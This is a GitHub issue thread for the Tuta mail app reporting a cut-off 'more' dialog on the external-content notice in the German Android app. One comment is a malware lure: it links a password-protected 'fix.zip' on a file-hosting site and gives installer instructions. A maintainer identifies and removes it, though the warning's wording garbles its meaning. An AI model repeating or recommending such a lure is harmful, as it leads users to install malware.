### ISSUE TITLE
"more" dialog on external content notification cut off

### ISSUE THREAD

**Issue by mithodin** [tutao/tutanota#7458]
- [x] This is not a feature request (existing functionality does not work, **not** missing functionality).
 I will request features on [forum](https://www.reddit.com/r/tutanota/) or via support.
- [x] I've searched and did not find a similar issue.

**Bug in mobile app**

**Describe the bug**
On an email with external content (e.g. images), clicking "more" on the notification brings up a dialog which (I assume) lets me block or allow the given domain. However, the dialog is cut off so it's impossible to determine which option is which.

**To Reproduce**
1. Open an email with external content
2. Click "more" on the notification
3. See cut off dialog

**Expected behavior**
I expect to be able to read the dialog.

**Screenshots**
![Screenshot_20240828-061018_Tuta](https://github.com/user-attachments/assets/ac52f87f-9e73-4050-b190-1eb7ab6c38b9)

**Smartphone (please complete the following information):**
 - Device: Asus ZenFone 9
 - OS: Android 14
 - Version v240.240816.0

**Additional context**
Language set to German

## Test notes
 - [ ] On mobile: switch language to German, open the external content more dropdown, see if the text is cut off

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rezbyte** [comment]
Hi,
I have just deleted the previous comment because of the malicious download.  I would strongly advice downloading and running any Tuta related files from unofficial sites.
